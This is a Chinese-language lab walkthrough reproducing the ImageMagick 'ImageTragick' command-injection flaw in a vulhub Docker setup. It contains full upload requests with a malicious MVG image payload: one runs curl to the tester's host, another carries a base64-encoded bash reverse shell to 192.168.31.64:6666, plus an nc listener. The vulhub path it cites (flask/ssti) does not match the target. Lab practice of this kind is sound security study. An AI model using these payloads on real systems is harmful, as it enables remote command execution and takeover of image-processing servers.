声明
好好学习,天天向上
漏洞描述
ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。但近来有研究者发现,当用户传入一个包含『畸形内容』的图片的时候,就有可能触发命令注入漏洞。
影响范围
ImageMagick 6.5.7-8 2012-08-17(手工测试风险存在)
ImageMagick 6.7.7-10 2014-03-06(手工测试风险存在)
低版本至6.9.3-9 released 2016-04-30
复现过程
这里使用6.9.2-10版本
使用vulhub
/app/vulhub-master/flask/ssti
使用docker启动
docker-compose build
docker-compose up -d
环境启动后,访问
http://192.168.31.139:8080
kali使用python开启一个8000http
python -c "import SimpleHTTPServer as s; s.test();" 8000
bp点击提交查询抓包,修改为如下的,如果命令执行成功,肯定会执行curl 192.168.31.64:8000,那么也就会在kali中看到请求
POST / HTTP/1.1
Host: 192.168.31.139:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymdcbmdQR1sDse9Et
Content-Length: 313
------WebKitFormBoundarymdcbmdQR1sDse9Et
Content-Disposition: form-data; name="file_upload"; filename="1.gif"
Content-Type: image/png
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/oops.jpg"|curl "192.168.31.64:8000
)'
pop graphic-context
------WebKitFormBoundarymdcbmdQR1sDse9Et--
核心代码是这段入栈和出栈,push和pop,我们把他改成反弹shell的,需要注意一点,echo后面的base64编码
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/oops.jpg?`echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMzEuNjQvNjY2NiAwPiYx | base64 -d | bash`"||id " )'
pop graphic-context
base64编码前
/bin/bash -i >& /dev/tcp/192.168.31.64/6666 0>&1
base64编码后
L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMzEuNjQvNjY2NiAwPiYx
和push、pop组成exp
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/oops.jpg?`echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMzEuNjQvNjY2NiAwPiYx | base64 -d | bash`"||id " )'
pop graphic-context
下面是我完整BP的包
POST / HTTP/1.1
Host: 192.168.31.139:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymdcbmdQR1sDse9Et
Content-Length: 384
------WebKitFormBoundarymdcbmdQR1sDse9Et
Content-Disposition: form-data; name="file_upload"; filename="1.gif"
Content-Type: image/png
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/oops.jpg?`echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMzEuNjQvNjY2NiAwPiYx | base64 -d | bash`"||id " )'
pop graphic-context
------WebKitFormBoundarymdcbmdQR1sDse9Et--
kali先监听6666
nc -lvvp 6666
BP重放发包,kali拿到shell
关闭镜像(每次用完后关闭)
docker-compose down
docker-compose常用命令
拉镜像(进入到vulhub某个具体目录后)
docker-compose build
docker-compose up -d
镜像查询(查到的第一列就是ID值)
docker ps -a
进入指定镜像里面(根据上一条查出的ID进入)
docker exec -it ID /bin/bash
关闭镜像(每次用完后关闭)
docker-compose down